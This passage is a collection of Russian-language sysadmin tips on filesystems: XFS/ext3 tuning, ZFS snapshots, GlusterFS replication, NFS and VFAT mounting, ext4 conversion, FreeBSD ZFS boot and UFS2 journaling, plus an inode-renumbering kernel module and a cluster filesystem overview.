ext3 используется только одна таблица inode, что приводит к необходимости использования очереди запросов. В XFS отдельная таблица inode создается для каждой Allocation Group, при этом каждая из групп может функционировать и изменяться параллельно, не влияя на другие группы. Ext3: При запуске mke2fs следует использовать опцию "-T", выбрав в качестве аргумента оптимальный план форматирования, приведенный в файле /etc/mke2fs.conf, например "mke2fs -T small". XFS: минимизируем число Allocation Group к размеру квоты на пользователей почтового сервера, так как при создании директорий XFS пытается создать новую директорию в еще не заполненной Allocation Group. C учетом того, что Linux-ядро поддерживает минимальный размер Allocation Group в 2^27 байт, то рассчитать число групп (agcount) можно по формуле: желаемый размер хранилища / (2^27) Например (4096 - размер блока, 128m - размер лога мета-данных): -l internal,lazy-count=1,size=128m -d agcount=399 -b size=4096 или -l internal,lazy-count=1,size=128m -d agsize=268435456 -b size=4096 Для поднятия производительность лог мета-данных можно перенести в отдельный пул, размещенный на SSD-накопителе. Если XFS необходимо оптимизировать для работы с большими файлами, то число Allocation Group нужно выбирать исходя из принципа - одна группа на одно ядро CPU. Оптимизация на этапе монтирования: XFS: noatime,nodiratime,attr2,nobarrier,logbufs=8,logbsize=256k,osyncisdsync при этом, nobarrier указываем только для хранилищ класса High-End, а osyncisdsync не нужно указывать при работе СУБД. Ext3: noatime,nodiratime,async,commit=1,data=journal,reservation при этом, опция async не подходит для СУБД, commit=1 и data=journal можно указать для высоконагруженных серверов. Опция reservation (предварительное выделение inode для содержимого создаваемых директорий) работает начиная с ядра 2.6.13 и позволяет увеличить производительность при многопоточной записи, но постепенно приводит к накоплению паразитной фрагментации в ФС.

Малоизвестный, но чрезвычайно удобный способ работы со снапшотами в ZFS (доп. ссылка 1) [комментарии]

Интересный способ работы со снапшотами ZFS без использования команд zfs, причем метод можно использовать не только с локальной машины, но и с удаленной. Работа локально. Создаем временный ZFS пул для тестирования: jmoekamp@opensolaris1:/testpool1# zpool create -f testpool1 /export/home/jmoekamp/test Переходим в данную директорию и создаем небольшой файл для подтверждения работоспособности снапшотов: jmoekamp@opensolaris1:/# cd testpool1 jmoekamp@opensolaris1:/testpool1# touch testfile1 jmoekamp@opensolaris1:/testpool1# ls testfile1 Для просмотра ранее созданных снапшотов можно использовать путь .zfs/snapshot (снапшотов нет, директория пуста): jmoekamp@opensolaris1:/testpool1# cd /testpool1/.zfs/snapshot jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# Но самое интересное, что через манипуляцию файлами в директории .zfs можно создавать, переименовывать и удалять снапшоты ! Без вызова zfs-команд, просто манипулируя файлами. Создадим в директории .zfs поддиректорию: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# mkdir snapshot-21042010-1 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs list -t snapshot | grep testpool1 testpool1@snapshot-21042010-1 0 - 22K - Как видим, автоматически был создан новый снапшот файловой системы. Проверить данный факт можно создав в основном дереве ZFS дополнительный файл: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# ls -l /testpool1 total 1 -rw-r--r-- 1 root root 0 2010-04-21 17:42 testfile1 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# touch /testpool1/testfile2 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# ls -l /testpool1 total 1 -rw-r--r-- 1 root root 0 2010-04-21 17:42 testfile1 -rw-r--r-- 1 root root 0 2010-04-21 17:45 testfile2 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# cd snapshot-21042010-1/ jmoekamp@opensolaris1:/testpool1/.zfs/snapshot/snapshot-21042010-1# ls -l total 1 -rw-r--r-- 1 root root 0 2010-04-21 17:42 testfile1 Переименуем директорию со снапшотом при помощи обычной команды mv, при этом автоматически будет переименован и снапшот: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# mv snapshot-21042010-1 snapshot-21042010-1.1 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs list -t snapshot | grep testpool1 testpool1@snapshot-21042010-1.1 19K - 22K - Создаем еще один снапшот: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# mkdir snapshot-21042010-2 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs list -t snapshot | grep testpool1 testpool1@snapshot-21042010-1.1 19K - 22K - testpool1@snapshot-21042010-2 0 - 22K - Как видно внутри уже два файла, в отличие от одного в первом примере. Для удаления снапшота достаточно удалить связанную с ним директорию: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# rmdir snapshot-21042010-1.1 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# ls -l total 2 drwxr-xr-x 2 root root 4 2010-04-21 17:45 snapshot-21042010-2 jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs list -t snapshot | grep testpool1 testpool1@snapshot-21042010-2 18K - 22K - Удаленное управление снапшотами Для управления снапшотами с другой машины можно использовать ssh или NFS. Экспортируем ZFS-раздел по NFS: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs set sharenfs=on testpool1 Монтируем данный NFS раздел с другой машины (в примере используем в качестве имени хоста NFS-клиента hivemind): jmoekamp@hivemind:~$ pfexec mount 192.168.2.123:/testpool1 /mnt jmoekamp@hivemind:~$ cd /mnt jmoekamp@hivemind:/mnt$ cd .zfs jmoekamp@hivemind:/mnt/.zfs$ ls shares snapshot jmoekamp@hivemind:/mnt/.zfs$ cd snapshot jmoekamp@hivemind:/mnt/.zfs/snapshot$ ls snapshot-21042010-2 Как и в случае с локальной системой, манипуляции с поддиректориями в директории .zfs в примонтированном NFS-разделе приводят к манипуляции со снапшотами на другой машине. Предварительно предоставляем пользователю jmoekamp право создавать, переименовывать и удалять снапшоты на базовом сервере opensolaris1: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs allow -u jmoekamp create,destroy,mount,snapshot testpool1 Пробуем создать снапшот, примонтировав NFS под пользователем jmoekamp: jmoekamp@hivemind:/mnt/.zfs/snapshot$ mkdir snapshot-remote-21042010 Проверяем: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs list -t snapshot | grep "testpool1" testpool1@snapshot-21042010-2 18K - 22K - testpool1@snapshot-remote-21042010 0 - 22K - Пробуем переименовать: jmoekamp@hivemind:/mnt/.zfs/snapshot$ mv snapshot-remote-21042010 snapshot-remote-21042010-2 Проверяем, что это не обман зрения и все действительно работает: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs list -t snapshot | grep "testpool1" testpool1@snapshot-21042010-2 18K - 22K - testpool1@snapshot-remote-21042010-2 0 - 22K - Пробуем удалить снапшот: jmoekamp@hivemind:/mnt/.zfs/snapshot$ rmdir snapshot-remote-21042010-2/ Проверяем на сервере: jmoekamp@opensolaris1:/testpool1/.zfs/snapshot# zfs list -t snapshot | grep "testpool1" testpool1@snapshot-21042010-2 18K - 22K -

Отказоустойчивое хранилище с автоматической репликацией на базе GlusterFS (доп. ссылка 1) Автор: petrov.pash [комментарии]

Инструкция по создании зеркалируемого (реплицированного) между двумя машинами хранилища файлов на базе GlusterFS (http://www.gluster.com/) и Ubuntu 9.10. Добавляемый в созданное хранилище файл на первом сервере буде сразу доступен на втором и наоборот, при этом данные на каждой машине будут использоваться из локального раздела, что обеспечивает значительно более высокую производительность, по сравнению с NFS. С особенности кластерной файловой системы GlusterFS можно познакомиться на данной странице. В рассматриваемой конфигурации задействованы три машины: два сервера (server1.example.com/192.168.0.100, server2.example.com/192.168.0.101) и один клиент (client1.example.com: IP адрес 192.168.0.102). Серверы выступают в роли машин для экспорта дисковых разделов, доступ к отказоустойчивому хранилищу осуществляется на стороне клиента. В представленном примере серверы и клиент размещены на разных машинах, но в реальных условиях клиентские и серверные составляющие обычно совмещены на одной машине. Соответствующую конфигурацию можно сгенерировать при помощи утилиты glusterfs-volgen. Установка серверной части GlusterFS на server1.example.com и server2.example.com: Так как GlusterFS доступен в стандартном репозитории Ubuntu 9.10, достаточно выполнить (сейчас и далее все действия выполняются под пользователем root): apt-get install glusterfs-server Для организации хранилища на сервере будем использовать каталог /data/export. Приводим файл конфигурации /etc/glusterfs/glusterfsd.vol на серверах в следующий вид: volume posix type storage/posix option directory /data/export end-volume volume locks type features/locks subvolumes posix end-volume volume brick type performance/io-threads option thread-count 8 subvolumes locks end-volume volume server type protocol/server option transport-type tcp # далее через запятую нужно перечислить IP или имена хостов клиентов # можно использовать маски вида 192.168.*, option auth.addr.brick.allow 192.168.0.102 subvolumes brick end-volume Запускаем сервер GlusterFS: /etc/init.d/glusterfs-server start Настройка клиента GlusterFS Для установки клиентской части GlusterFS выполняем: aptitude install glusterfs-client glusterfs-server Хранилище будем монтировать в каталог /mnt/glusterfs. Приводим файл конфигурации клиента /etc/glusterfs/glusterfs.vol в следующий вид: volume remote1 type protocol/client option transport-type tcp option remote-host 192.168.0.100 # server1.example.com option remote-subvolume brick end-volume volume remote2 type protocol/client option transport-type tcp option remote-host 192.168.0.101 # server2.example.com option remote-subvolume brick end-volume volume replicate type cluster/replicate subvolumes remote1 remote2 end-volume volume writebehind type performance/write-behind option window-size 1MB subvolumes replicate end-volume volume cache type performance/io-cache option cache-size 512MB subvolumes writebehind end-volume Монтируем файловую систему GlusterFS в каталог /mnt/glusterfs: glusterfs -f /etc/glusterfs/glusterfs.vol /mnt/glusterfs или mount -t glusterfs /etc/glusterfs/glusterfs.vol /mnt/glusterfs Для автоматизации монтирования во время загрузки в /etc/fstab сдедует добавить: /etc/glusterfs/glusterfs.vol /mnt/glusterfs glusterfs defaults 0 0 Тестирование Создаем в GlusterFS разделе на стороне клиента несколько файлов: touch /mnt/glusterfs/test1 touch /mnt/glusterfs/test2 Эти файла сразу должны появиться на серверах в каталоге /data/export Выключим первый сервер и добавить на стороне клиента еще несколько файлов: touch /mnt/glusterfs/test3 touch /mnt/glusterfs/test4 rm -f /mnt/glusterfs/test2 Изменения должны появиться на втором сервере. Включим первый сервер и увидим, что данные на нем неактуальны. Изменения будут синхронизированы автоматически, для инициирования синхронизации на стороне клиента достаточно выполнить любую операцию с разделом, например, посмотреть содержимое через "ls -l /mnt/glusterfs/". GlusterFS в роли замены NFS с поддержкой кэширования. Чтобы примонтировать раздел в NFS-подобном виде, без репликации, достаточно добавить в конфигурации сервера в блоке "volume locks" опцию "option mandatory-locks on". На стороне клиента нужно закомментировать в конфигурации блок "volume replicate" и убрать блок, описывающий вторую реплицируемую директорию "volume remote2". В секции "volume writebehind" на стороне клиента при этом заменяем опцию "subvolumes replicate" на "subvolumes remote", а также можем уменьшить размер окна до 1 Мб ("option window-size 1MB"). Создание распределенного на 4 узла хранилища При реализации хранилища, распределенного на 4 узла, настройка производится аналогично, по аналогии с remote2 добавляются разделы remote3 и remote4. Вместо "volume replicate" добавляется раздел "volume distribute": ... volume remote3 type protocol/client option transport-type tcp option remote-host server3.example.com option remote-subvolume brick end-volume volume remote4 type protocol/client option transport-type tcp option remote-host server4.example.com option remote-subvolume brick end-volume volume distribute type cluster/distribute subvolumes remote1 remote2 remote3 remote4 end-volume ... В блоке "volume writebehind" приписывается "subvolumes distribute". Конфигурацию можно сгенерировать автоматически, например, запустив на одном из серверов: glusterfs-volgen --name repstore1 --raid 1 hostname1:/export/sdb1 \ hostname2:/export/sdb1 hostname3:/export/sdb1 hostname4:/export/sdb1 При надлежащей настройке параметров доступа к серверам все параметры конфигурации серверных и клиентских составляющих на всех машинах распределенного хранилища будут обновлены автоматически. Для систем не поддерживающих GlusterFS доступ к хранилищу можно организовать через NFS, SMB или WebDAV.

Монтирование VFAT в Linux как в Windows Автор: Bill Routers [комментарии]

Возможно, повторюсь, но, на мой взгляд, кому-нибудь будет полезно. Локаль - ru_RU.UTF-8 Проверено Ubuntu 8.04, Debian 5.0.3. Путем "долгих исследований" получил следующие опции монтирование раздела FAT. /dev/sdf1 /media/usb vfat rw,async,flush,users,noatime,noauto,utf8,codepage=866,check=r,\ quiet,showexec,shortname=winnt 0 0 Главное это опции: utf8,codepage=866,check=r. По умолчанию они не задействованы. Без них "vfat" ведет себя не так как Windows XP Rus, позволяя создавать файлы по русски в разном регистре. Саша <> САша <> саша <> СашА. Конечно, можно создавать файлы "only English", но не всегда это удобно и возможно, особенно при копировании.

Изменение номера inode файла в Linux Автор: Victor Leschuk [комментарии]

Для некоторых специфических целей может понадобиться изменить номер inode у существующего файла, либо создать файл с заранее заданным номером. Штатными средствами сделать это - задача нетривиальная, однако с помощью модуля ядра это несложно. Создаем файл inode_modify.c следующего содержания: #include <linux/module.h> #include <linux/kernel.h> #include <linux/version.h> #include <linux/fs.h> #include <linux/namei.h> #ifndef BUF_LEN #define BUF_LEN 256 #endif char file[BUF_LEN]; unsigned long new_num=0; module_param_string( name, file, BUF_LEN, 0); module_param(new_num, ulong, 0); struct nameidata nd; unsigned long get_number() { int error; error = path_lookup( file, 0, &nd); printk( KERN_ALERT "name = %s\n", file); if(error) { printk( KERN_ALERT "Can't access file\n"); return -1; } #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,25) return nd.path.dentry->d_inode->i_ino; #else return nd.dentry->d_inode->i_ino; #endif } unsigned long set_number(unsigned long new_num) { #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,25) nd.path.dentry->d_inode->i_ino = new_num; return nd.path.dentry->d_inode->i_ino; #else nd.dentry->d_inode->i_ino = new_num; return nd.dentry->d_inode->i_ino; #endif } int inode_modify_init(){ unsigned long inode_num; inode_num = get_number(); printk ( KERN_ALERT "Inode number is %lu\n", inode_num); printk ( KERN_ALERT "New inode number is %lu\n", set_number(new_num)); return 0; } void inode_modify_exit(){ printk(KERN_ALERT "Exiting...\n"); } module_init(inode_modify_init); module_exit(inode_modify_exit); MODULE_LICENSE("GPL"); MODULE_AUTHOR("Victor Leschuk <Victor.Leschuk@ebanat.com>"); И простой Makefile: obj-m := inode_modify.o После чего в директории с модулем: $ make -C /path/to/kernel/sources SUBDIRS=$PWD modules Здесь нужно помнить, что исходники и версия gcc должны соответствовать тем, которые были использованы при сборке используемого ядра. Далее тестируем модуль: $ touch /dev/shm/test $ ls -i /dev/shm/test 172461 /dev/shm/test $ sudo insmod ./inode_modify.ko name=/dev/shm/test new_num=12345 $ ls -i /dev/shm/test 12345 /dev/shm/test $ sudo rmmod inode_modify $ dmesg |tail name = /dev/shm/test Inode number is 172461 New inode number is 12345 Exiting...

Настройка NFS сервера и клиента в Debian Lenny (доп. ссылка 1) (доп. ссылка 2) Автор: Сгибнев Михаил [комментарии]

1. Вводные данные * NFS Server: server.example.com, IP address: 192.168.0.100 * NFS Client: client.example.com, IP address: 192.168.0.101 2 Установка NFS На машине, выступающей в роли NFS сервера, выполняем: apt-get install nfs-kernel-server nfs-common portmap На машине, выступающей в роли NFS клиента, выполняем: apt-get install nfs-common portmap 3. Экспортируем каталоги с сервера Для того чтобы сделать доступными для клиентов каталоги /home и /var/nfs необходимо предпринять следующие нехитрые действия. Когда клиент получает доступ к общему NFS ресурсу, то обычно это случается с правами пользователя nobody. Владельцем каталога /home nobody не является (и я не рекомендую это менять), а поскольку мы хотим иметь права на чтение и запись в /home, то нам необходимо указать NFS работать с правами пользователя root (если /home будет доступен только для чтения, то в этом нет необходимости). Каталог /var/nfs не существует, поэтому мы его создадим и назначим владельцем nobody и nogroup: mkdir /var/nfs chown nobody:nogroup /var/nfs Теперь необходимо отредактировать файл /etc/exports, в котором указываются общие ресурсы. Мы укажем в нем /home и /var/nfs, при этом доступ к /home будет осуществляться с правами пользователя root. # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /home 192.168.0.101(rw,sync,no_root_squash,no_subtree_check) /var/nfs 192.168.0.101(rw,sync,no_subtree_check) Для получения дополнительной информации, воспользуйтесь командой man 5 exports. Для того, чтобы изменения вступили в силу, выполните команду: exportfs -a 4. Монтируем NFS ресурс на клиенте Создаем каталоги, куда мы будем монтировать шары NFS: mkdir -p /mnt/nfs/home mkdir -p /mnt/nfs/var/nfs Монтируем: mount 192.168.0.100:/home /mnt/nfs/home mount 192.168.0.100:/var/nfs /mnt/nfs/var/nfs Проверяем: client:~# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg0-root 19G 676M 17G 4% / tmpfs 253M 0 253M 0% /lib/init/rw udev 10M 80K 10M 1% /dev tmpfs 253M 0 253M 0% /dev/shm /dev/sda1 471M 20M 427M 5% /boot 192.168.0.100:/home 29G 684M 27G 3% /mnt/nfs/home 192.168.0.100:/var/nfs 29G 684M 27G 3% /mnt/nfs/var/nfs И: client:~# mount /dev/mapper/vg0-root on / type ext3 (rw,errors=remount-ro) tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) udev on /dev type tmpfs (rw,mode=0755) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620) /dev/sda1 on /boot type ext3 (rw) 192.168.0.100:/home on /mnt/nfs/home type nfs (rw,addr=192.168.0.100) 192.168.0.100:/var/nfs on /mnt/nfs/var/nfs type nfs (rw,addr=192.168.0.100) 5. Проверка На клиенте создадим несколько файлов: touch /mnt/nfs/home/test.txt touch /mnt/nfs/var/nfs/test.txt Зайдем на сервер и полюбуемся на результат: server:~# ls -l /home/ total 4 drwxr-xr-x 2 administrator administrator 4096 2009-02-16 13:18 administrator -rw-r--r-- 1 root root 0 2009-03-12 17:08 test.txt server:~# ls -l /var/nfs total 0 -rw-r--r-- 1 nobody nogroup 0 2009-03-12 17:08 test.txt server:~# Обратите внимание на то, что владельцы файлов различаются. 6 Монтирование ресурсов NFS во время загрузки Вместо ручного монтирования шар, вы можете указать их в файле /etc/fstab для автоматического монтирования во время начальной загрузки. vi /etc/fstab [...] 192.168.0.100:/home /mnt/nfs/home nfs rw,sync,hard,intr 0 0 192.168.0.100:/var/nfs /mnt/nfs/var/nfs nfs Вместо опций rw,sync,hard,intr вы можете использовать что-то другое, для получения дополнительной информации, обратитесь к man nfs. Для проверки правильности монтирования перезагрузите систему. После этого в очередной раз проверим результат: df -h

Перевод существующего раздела на файловую систему Ext4 (доп. ссылка 1) [комментарии]

Для создания нового Ext4 раздела в e2fsprogs пакете присутствует утилита mkfs.ext4. Рекомендуется обновить e2fsprogs до последней версии, минимум до 1.41.3. Для перевода Ext3 в Ext4, необходимо отмонтировать раздел (в нашем случае /dev/sda5) и выполнить: tune2fs -O extents,uninit_bg,dir_index /dev/sda5 После выполнения данной команды обязательно (!) нужно запустить fsck, если этого не сделать файловая система не примонтируется. Во время выполнения fsck будет выведено сообщение о некорректной контрольной суммы группы дескрипторов, но это нормально, можно смело соглашаться с изменениями. fsck -pf /dev/sda5 Старые файлы после преобразования останутся привязанными к старому методу мапинга блоков. Для задействования экстентов (extent) необходимо провести дефрагментацию, в чем может помочь утилита defrag. Существующий Ext3 также можно примонитровать Ext4 драйвером, в этом случае не будут задействованы изменения связанные с форматом хранения данных, а включатся только внутренние оптимизации, такие как отложенное распределение информации (Delayed allocation) и mballoc. mount -t ext4 /dev/yourpartition /mnt" Список новшеств файловой системы Ext4 можно посмотреть на странице http://wiki.opennet.ru/Ext4

Настройка загрузки ZFS с GPT-раздела во FreeBSD и создание зеркала (доп. ссылка 1) Автор: unknown [комментарии]

Во FreeBSD 8-CURRENT недавно появилась поддержка загрузки ядра с ZFS, а сама файловая система была обновлена до версии 13. Процесс развертывания ZFS с возможностью загрузки с нее очень простой: 1. Собираете world с LOADER_ZFS_SUPPORT и kernel с поддержкой gpart(8): # добавляем в make.conf(5) опцию поддержки ZFS для loader(8) echo LOADER_ZFS_SUPPORT=yes >>/etc/make.conf # собираем world... нет, только loader(8) и загрузочный код cd /usr/src/sys/boot make cleandir; make cleandir make obj depend all install # добавляем поддержку таблиц разделов для gpart(8) cat MYKERNEL include GENERIC nooption GEOM_BSD nooption GEOM_MBR options GEOM_PART_BSD options GEOM_PART_MBR options GEOM_PART_GPT # собираем kernel make kernel KERNCONF=MYKERNEL -C/usr/src 2. Размечаете первый диск командой gpart(8) на несколько разделов, из которых обязательны только freebsd-boot и freebsd-zfs: # создаем таблицу разделов типа GPT на диске ad0 gpart create -s GPT ad0 # добавляем загрузочный код, позволяющий загружаться с GPT разделов gpart bootcode -b /boot/pmbr ad0 # создаем раздел для кода загрузки loader(8)'а с раздела GPT gpart add -b 34 -s 256 -t freebsd-boot ad0 # записываем загрузочный код на него gpart bootcode -p /boot/gptzfsboot -i 1 ad0 # создаем swap раздел для возможности использовать его # в качестве dumpdev, т.к. делать kernel dump'ы на zvol'ах # невозможно gpart add -b 290 -s 2097152 -t freebsd-swap ad0 # создаем основной раздел для ZFS gpart add -b 2097442 -s 232344173 -t freebsd-zfs ad0 # смотрим на результат gpart show => 34 234441581 ad0 GPT (112G) 34 256 1 freebsd-boot (128K) 290 2097152 2 freebsd-swap (1.0G) 2097442 232344173 3 freebsd-zfs (111G) 3. Создаете pool для ZFS на первом разделе и загружаетесь с него: # создаем pool с именем `h', выключенном поддержкой # времени последнего доступа и включенным сжатием данных zpool create -O atime=off -O compression=on h ad0p3 # создаем необходимые dataset'ы zfs create -p -o setuid=off -o utf8only=on h/usr/home zfs create -o sharenfs='-alldirs -webnfs' h/usr/ports zfs create -o atime=on h/var zfs create -o readonly=on h/var/empty # населяем pool[1] rsync -aHS --del --fileflags --filter 'merge migrate.rsync' / /h/ # перезагружаемся shutdown -r now # загружаемся *не* с ZFS в single-user режим (loader prompt) boot -s # меняем точку монтирования pool'а на корень /etc/rc.d/hostid restart /sbin/zfs set mountpoint=/ h # перезагружаемся /sbin/reboot # загружаемся с ZFS (loader prompt) load zfs set vfs.root.mountfrom=zfs:h boot # добавляем в loader.conf(5) поддержку zfs и точку # монтирования / (корня) echo zfs_load=YES >>/boot/loader.conf echo vfs.root.mountfrom=\"zfs:h\" >>/boot/loader.conf 4. Повторяете шаг 1 для второго диска и подсоединяете его к "зеркалу": # Размечаем диск с учетом того, что количество блоков # у freebsd-zfs должно быть такое же, как и на первом диске. # В даннном примере - 484200428. => 34 488394988 ad0 GPT (233G) 34 256 1 freebsd-boot (128K) 290 4194304 2 freebsd-swap (2.0G) 4194594 484200428 3 freebsd-zfs (231G) => 34 488397101 ad1 GPT (233G) 34 256 1 freebsd-boot (128K) 290 4196417 2 freebsd-swap (2.0G) 4196707 484200428 3 freebsd-zfs (231G) # подсоединяете его к pool'у как элемент зеркала # (не перепутайте с *add*) zpool attach h ad0p3 ad1p3 # смотрим на результат zpool status pool: h state: ONLINE scrub: none requested config: NAME STATE READ WRITE CKSUM h ONLINE 0 0 0 mirror ONLINE 0 0 0 ad0p3 ONLINE 0 0 0 ad1p3 ONLINE 0 0 0 errors: No known data errors Примечание: Тест проводился на 14 версии и с использованием вот этого патча - http://pastebin.com/f3d2089f3 [1] пример migrate.rsync: exclude .ccache exclude /h exclude /dev exclude /nfs exclude /tmp exclude /var/emtpy exclude /var/run Стоит не забыть потом создать эти директории в /h с соответствующими правами на них. В частности без /dev система не загрузится.

Клонирование дисков во FreeBSD, используя снапшоты ФС [комментарии]

Создаем снапшот test1 раздела /home mount -v -u -o snapshot /home/snapshot/test1 /home или другой метод: mksnap_ffs /home /home/snapshot/test1 Привязываем снапшот к устройству /dev/md1: mdconfig -a -t vnode -f /home/snapshot/test1 -u 1 При необходимости снапшот можно смонтировать и посмотреть его содержимое: mount -o ro /dev/md1 /mnt .... umount /mnt Копируем содержимое раздела на второй диск: dd if=/dev/md1 of=/dev/ad4s1f bs=16k Отключаем снапшот mdconfig -d -u 1 Выполняем fsck на новом разделе: fsck -f /dev/ad4s1f

Оптимизация структуры директорий в файловых системах ext2 и ext3 (доп. ссылка 1) [обсудить]

Опция "-D" утилиты e2fsck позволяет выполнить переиндексацию при использовании dir_index (tune2fs -O +dir_index), иначе выполнить перекомпановку с сортировкой (когда было создано или удалено большое количество директорий) и сокращением размера (когда в директории было много файлов, а потом их удалили). Пример запуска (/dev/sdb1 должен быть отмонтирован или переведен в режим только для чтения): # e2fsck -D -f /dev/sdb1

Обзор сетевых и кластерных ФС: Lustre, GFS, AFS, GFarm (доп. ссылка 1) Автор: johnjoy [комментарии]
Lustre - кластерная ФС, AFS - сетевая ФС.
Если подробнее - то AFS относится примерно к тому классу, в котором сидят NFS, SMB, и win2K3 DFS. Основная их задача - качественный доступ к различным (раскиданным по сети) ресурсам, с соблюдением блокировок и напором на контроль доступа и централизованное управление. Здесь четко прослеживается модель "клиент-сервер" - большинство участников сетовой ФС являются клиентами, а под шары выделяются чаще отдельные серваки. С точки зрения производительности для такой ФС критериями являются пропускная способность сервер-клиент и количество поддерживаемых коннектов. Масштабируется такая ФС вертикально - более шустрым железом. Надежность тоже поддерживается на уровнях ниже сетевой ФС (RAID, репликация средствами ОС и администратором 24/7 на мобильном =)
Кластерных ФС известно негусто - навскидку Lustre, Google FS (+Hadoop), что-то было у IBM.
Отличительная особенность - все участники ФС унифицированы и являются и серверами и клиентами ФС (это именно особенности реализации, конечно же можно и настроить для работы как "несколько серверов - много клиентов", но преимуществ в этом случае не получите, скорее наоборот)
Обычный принцип действия - работа на уровне блоков: разбитый на блоки файл "размазывается" по нескольким серверам, при его чтении клиент сам собирает блоки в файл. (Комментарий Алексея: Это Google FS & RedHat GFS.. в люстре оперируют понятием объект).
Критерии оценки таких ФС - общая пропускная способность ФС кластера (то есть сколько гб/с крутится в пределах кластера) и латентность (задержка между запросом файла и его получением). Также тут важна надежность - все блоки реплицируются на уровне ФС, вылет нода не сказывается на работе кластера.
ФС этого класса очень разные. Lustre заточена под hiperf вычисления с низкой латентностью, посему пользуют что-нить типа InfiniBand и нестандартные MPI. Lustre замонтированая представляет из себя слегка урезaную ext3 для 2.4 ядер, для 2.6 используется ldiskfs которая значительно ближе к ext4.
Google FS и Hadoop - вообще с классической точки зрения не ФС, ибо ничего не монтируют а предоставляют RPC API для разработчиков. Рассчитаны они на гигантские объемы информации, работу в основном на чтение большими блоками (в мегабайтах, стандартный блок такой ФС - 32-64Мб) и в очень больших количествах.
Также есть shared storage FS - эти нужны при работе нескольких (многих) серверов с внешними дисковыми массивами. Основная задача - обеспечить быструю и правильную блокировку совместного доступа (via SAN, iSCSI, SCSI). Без них фактически каждый сервер должен работать со своим личным выделенным на массиве разделом. Из известных - GFS от RedHat, Oracle Cluster File System, PolyServe и Veritas CFS.
RedHat GFS - раздает raw девайс и пытается управлять блокировками на уровне блоков, без учета логической организации.
gfarm изначально позиционирует себя для таковой модели использования: есть много данных, распределенных по нодам, нужно их все параллельно обработать. В случае люстры и подобных - compute node сначала фетчит себе данные из кластерной фс, обрабатывает и возвращает обратно (отсюда требования к пропускной способности и латентности). В случае gfarm - задание по обработке для compute нода попадает благодаря gfarm именно на тот нод, где локально лежит одна из реплик требуемых данных. Соответственно по сети происходит трансфер задания на обработку данных , а не самих данных. (например, здесь, да и вообще тут- большинство тем именно parallel computing, а не distributed fs).
Некая сборная информация есть в wikipedia.

Инструкция по включению журналирования в UFS2. (доп. ссылка 1) Автор: Sokolov Alexey [комментарии]

Требуется создать журналируемую файловую систему UFS2 объемом более 1 Гб на FreeBSD 6.1-STABLE. Для начала необходимо обновить дерево исходных текстов (/usr/src) до стабильной версии. После чего переходим в каталог /usr/src и создаем там необходимые директории: # cd /usr/src # mkdir {sbin/geom/class/journal,sys/geom/journal,sys/modules/geom/geom_journal} Теперь качаем сам патч: # fetch http://people.freebsd.org/%7Epjd/patches/gjournal6.patch Накладываем его на исходные тексты: # patch < gjournal6.patch Компилируем и ставим geom_journal (возможно имеет смысл пересобрать весь мир): Далее есть два пути - пересобрать весь "мир" (см. файл /usr/src/UPDATING), либо пересобрать только то, что было модифицировано. Предпочтительней первый путь, однако можно обойтись и без него. Для этого пересоберите следующие утилиты (зайдя в нижеперечисленные каталоги и выполнив в каждом из них 'make; make install; make clean'): /usr/src/include/ /usr/src/sbin/geom/class/ /usr/src/sbin/mount/ После чего добавляем в конфиг ядра строчку: options UFS_GJOURNAL Компилируем ядро, ставим, перезагружаемся... После перезагрузки подгружаем необходимый модуль командой # gjournal load либо: # kldload geom_journal.ko (команды эквивалентны) Далее нам необходимо размонтировать раздел, на который мы собираемся поставить журнал. Пусть это будет '/dev/ad0s3d' и точка монтирования '/mnt/work': # umount -f /mnt/work Теперь собстенно "прикручиваем" журнал: # gjournal label /dev/ad0s3d Монтируем командой: # mount -o async,gjournal /dev/ad0s3d.journal /mnt/work NB! префикс '.journal' появляется при наличии в памяти модуля geom_journal.ko. Поэтому, если вы захотите чтобы система автоматически монтировала раздел с поддержкой журнала: пропишите в файл /boot/loader.conf строчку: geom_journal_load="YES" и соответствующую запись в fstab. Для данного примера она будет выглядеть так: /dev/ad0s3d.journal /mnt/work ufs rw,async,journal 2 2 Все, готово! (C) 2006 Sokolov Alexey <nullbsd at gmail.com>

Создание снапшота UFS2 в FreeBSD 5 (доп. ссылка 1) [комментарии]

mount -u -o snapshot ./snapshot_image /var mdconfig -a -t vnode -f ./snapshot_image -u 1 mount -o ro /dev/md1 /mnt/snap ... umount /mnt/snap mdconfig -d -u 1 Также можно использовать специализированную утилиту snapshot, представляющую собой фронтенд к mount и mdconfig.

Создание снапшота XFS под Linux используя возможности LVM (доп. ссылка 1) Автор: arstechnica.com [комментарии]

